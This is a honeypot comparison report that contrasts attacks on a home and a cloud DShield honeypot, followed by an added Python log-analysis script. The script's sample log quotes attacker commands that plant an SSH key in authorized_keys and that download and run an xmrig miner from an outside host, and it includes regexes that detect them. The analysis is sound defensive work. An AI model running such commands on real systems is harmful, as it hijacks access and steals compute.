Attack Observation Report: Comparison Project
Executive Summary
After monitoring a few months of attacks on my home network's [1]DShield honeypot, it became evident that most of these incidents were driven by automated scripts or bot behavior, with most sessions concluding within a minute. While this provided some insight, the predictability and repetitiveness of these attacks limited the depth of engagement and analysis. I deployed a second honeypot on [2]Digital Ocean, strategically located in Bangalore, India, to determine whether a different environment might attract more varied or sophisticated attacks. The goal was to explore whether this new setting would yield differences in attack patterns, techniques, or threat sources. A comparison of these two environments uncovered similarities and differences.
Comparison of Honeypot Environments
Home Network Honeypot:
- Total Attacks: 97
- Most Common Command Sequence: 22 commands (seen in 68 sessions)
- Common Payload: [3]trojan.shell/malkey
- Notable IP Sources: France Telecom, SpaceX Starlink
Digital Ocean Honeypot:
- Total Attacks: 110
- Most Common Command Sequence: 22 commands (seen in 53 sessions)
- Common Payloads: trojan.shell/malkey, ELF-based miners
- Notable IP Sources: Swisscom, SKB-Enterprise
Key Observations
1. Attack Frequency and Distribution
- Home Network Honeypot:
- Recorded 97 distinct attack sessions over a 24-hour monitoring period. The attacks were consistent, mostly automated, and repetitive, indicating a high prevalence of bot-driven behavior.
- Digital Ocean Honeypot:
- Recorded a slightly higher number of attack sessions, 110. The increase could be due to its more exposed and globally reachable address space, but the difference is not large.
2. Command Execution Patterns
- Home Network Honeypot:
- The most common command sequence involved 22 commands in 68 sessions, focused on establishing persistence by planting an attacker-controlled SSH key. Commands like
chattr -ia .ssh
and
chmod -R go= ~/.ssh
were common. The first clears the immutable and append-only attributes so that ~/.ssh can be rewritten even if an administrator locked it down; the second strips group and world permissions so that sshd, which rejects authorized_keys files with loose permissions when StrictModes is enabled (the default), will accept the planted key. Together they lock in the attacker's own access rather than securing the host.
- Digital Ocean Honeypot:
- The same 22-command sequence appeared here as well (in 53 sessions), but the sessions were more diverse overall. Additional commands were noted, especially ones that download and launch [4]ELF-based cryptocurrency miners, indicating a broader set of objectives beyond simple persistence.
3. Payload Diversity
- Home Network Honeypot:
- Predominantly deployed trojan.shell/malkey, which is aimed at unauthorized SSH access by inserting malicious keys. A minor variation involved [5]trojan.ircbot/shell, but the attackers were consistent overall.
- Digital Ocean Honeypot:
- Encountered a broader range of payloads, including ELF-based miners like [6]miner.r002c0dgm24/xmrig, suggesting that attackers targeting cloud-based infrastructure are more resourceful or are looking to monetize the compute that cloud hosts provide.
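To make the session counts, the "most common command sequence" figures, and the payload tagging in sections 2 and 3 reproducible, here is an added example (not part of the original report or of the DShield honeypot project) that reads Cowrie-style JSON log lines, groups commands by session, finds the most frequently repeated command sequence, and tags sessions that show the SSH-key persistence pattern or a miner download. The field names (eventid, session, src_ip, input) follow Cowrie's JSON log format, which the DShield honeypot uses; the log lines embedded below are constructed for illustration and are not data from either honeypot, and the indicator patterns are my own assumptions about what the malkey and miner sessions look like.

```python
"""Summarise Cowrie-style honeypot sessions and tag persistence/miner activity.

Added example, not code from the original report. Field names follow the
Cowrie JSON log format; the sample lines are constructed, not real captures.
"""
import json
import re
from collections import Counter

# Constructed sample log: two sessions replay the SSH-key persistence sequence,
# one drops a miner, and one is plain reconnaissance from a repeat source IP.
SAMPLE_LOG = """
{"eventid":"cowrie.session.connect","session":"s1","src_ip":"192.0.2.10","timestamp":"2024-09-01T10:00:00Z"}
{"eventid":"cowrie.command.input","session":"s1","src_ip":"192.0.2.10","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh"}
{"eventid":"cowrie.command.input","session":"s1","src_ip":"192.0.2.10","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo ssh-rsa AAAA.constructed.key >> .ssh/authorized_keys && chmod -R go= ~/.ssh"}
{"eventid":"cowrie.command.input","session":"s1","src_ip":"192.0.2.10","input":"uname -a"}
{"eventid":"cowrie.session.connect","session":"s2","src_ip":"198.51.100.7","timestamp":"2024-09-01T10:05:00Z"}
{"eventid":"cowrie.command.input","session":"s2","src_ip":"198.51.100.7","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh"}
{"eventid":"cowrie.command.input","session":"s2","src_ip":"198.51.100.7","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo ssh-rsa AAAA.constructed.key >> .ssh/authorized_keys && chmod -R go= ~/.ssh"}
{"eventid":"cowrie.command.input","session":"s2","src_ip":"198.51.100.7","input":"uname -a"}
{"eventid":"cowrie.session.connect","session":"s3","src_ip":"203.0.113.5","timestamp":"2024-09-01T11:00:00Z"}
{"eventid":"cowrie.command.input","session":"s3","src_ip":"203.0.113.5","input":"cd /tmp; wget http://203.0.113.99/xmrig -O .x; chmod +x .x; ./.x -o pool.example:3333"}
{"eventid":"cowrie.session.connect","session":"s4","src_ip":"198.51.100.7","timestamp":"2024-09-01T12:00:00Z"}
{"eventid":"cowrie.command.input","session":"s4","src_ip":"198.51.100.7","input":"uname -a"}
{"eventid":"cowrie.command.input","session":"s4","src_ip":"198.51.100.7","input":"cat /proc/cpuinfo"}
"""

# Assumed indicators for the SSH-key persistence pattern; at least two must hit
# so a lone "authorized_keys" grep in a recon session does not count.
SSH_PERSISTENCE = [
    re.compile(r"chattr\s+-ia\s+\.ssh"),          # clear immutable/append-only on ~/.ssh
    re.compile(r"authorized_keys"),               # key planted here
    re.compile(r"chmod\s+-R\s+go=\s+~?/?\.ssh"),  # satisfy sshd StrictModes
]
# Assumed miner indicators: binary names and pool protocol strings.
MINER = re.compile(r"xmrig|minerd|stratum\+tcp|nicehash", re.IGNORECASE)


def parse_sessions(log_text):
    """Group commands by session id; returns {session: {src_ip, commands}}."""
    sessions = {}
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        entry = sessions.setdefault(
            event["session"], {"src_ip": event.get("src_ip"), "commands": []}
        )
        if event["eventid"] == "cowrie.command.input":
            entry["commands"].append(event["input"])
    return sessions


def classify(commands):
    """Tag a session's command list with the behaviours it exhibits."""
    tags = set()
    joined = "\n".join(commands)
    if sum(1 for pat in SSH_PERSISTENCE if pat.search(joined)) >= 2:
        tags.add("ssh_key_persistence")
    if MINER.search(joined):
        tags.add("crypto_miner")
    return tags


def most_common_sequence(sessions):
    """Return (command tuple, session count) for the most repeated full sequence."""
    counts = Counter(tuple(s["commands"]) for s in sessions.values() if s["commands"])
    if not counts:
        return (), 0
    return counts.most_common(1)[0]


def summarize(log_text):
    """Produce the per-honeypot figures the report compares."""
    sessions = parse_sessions(log_text)
    seq, hits = most_common_sequence(sessions)
    tag_counts = Counter()
    for s in sessions.values():
        tag_counts.update(classify(s["commands"]))
    return {
        "total_sessions": len(sessions),
        "distinct_ips": len({s["src_ip"] for s in sessions.values()}),
        "top_sequence_len": len(seq),
        "top_sequence_sessions": hits,
        "tags": dict(tag_counts),
    }


if __name__ == "__main__":
    print(json.dumps(summarize(SAMPLE_LOG), indent=2))
```

Point it at a real cowrie.json by replacing SAMPLE_LOG with the file contents; counting full command tuples is what turns "22 commands in 68 sessions" into a reproducible number, and separating total sessions from distinct source IPs avoids over-counting a single scanner that reconnects, as s2 and s4 do above.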
4. Geographical and ASNAME Information
- Home Network Honeypot:
- Attack traffic primarily originated from providers like France Telecom and SpaceX Starlink, with a more concentrated geographic spread, reflecting the limited exposure of a home network.
- Digital Ocean Honeypot:
- Attracted a more geographically diverse range of attacks, with IPs from Swisscom and SKB-Enterprise, indicating the broader exposure of a cloud-hosted address.
5. Malware and Threat Intelligence
- Home Network Honeypot:
- The consistent use of trojan.shell/malkey highlights the automated nature of the attacks, leveraging known and reliable scripts for persistent unauthorized access.
- Digital Ocean Honeypot:
- Encountered newer and more varied malware, including ELF-based miners, which are commonly used for illicit cryptocurrency mining on cloud servers. Seeing recent payloads suggests that attackers targeting cloud infrastructure keep up with current trends.
Conclusion
This experiment demonstrates that a honeypot's environment influences the types and diversity of attacks it attracts. With its cloud-based infrastructure and geographic placement, the Digital Ocean honeypot encountered more varied and sophisticated threats compared to the more predictable attacks on the home network honeypot. This highlights the importance of considering environmental factors in cyber threat analysis and defense strategy development. The broader geographic range and diversity of attack tools seen in the Digital Ocean honeypot suggest that cloud-based systems, due to their high-value infrastructure, may attract more advanced and varied threats, underscoring the need for robust and adaptable security measures in such environments.
References
[1] DShield Honeypot
[2] Digital Ocean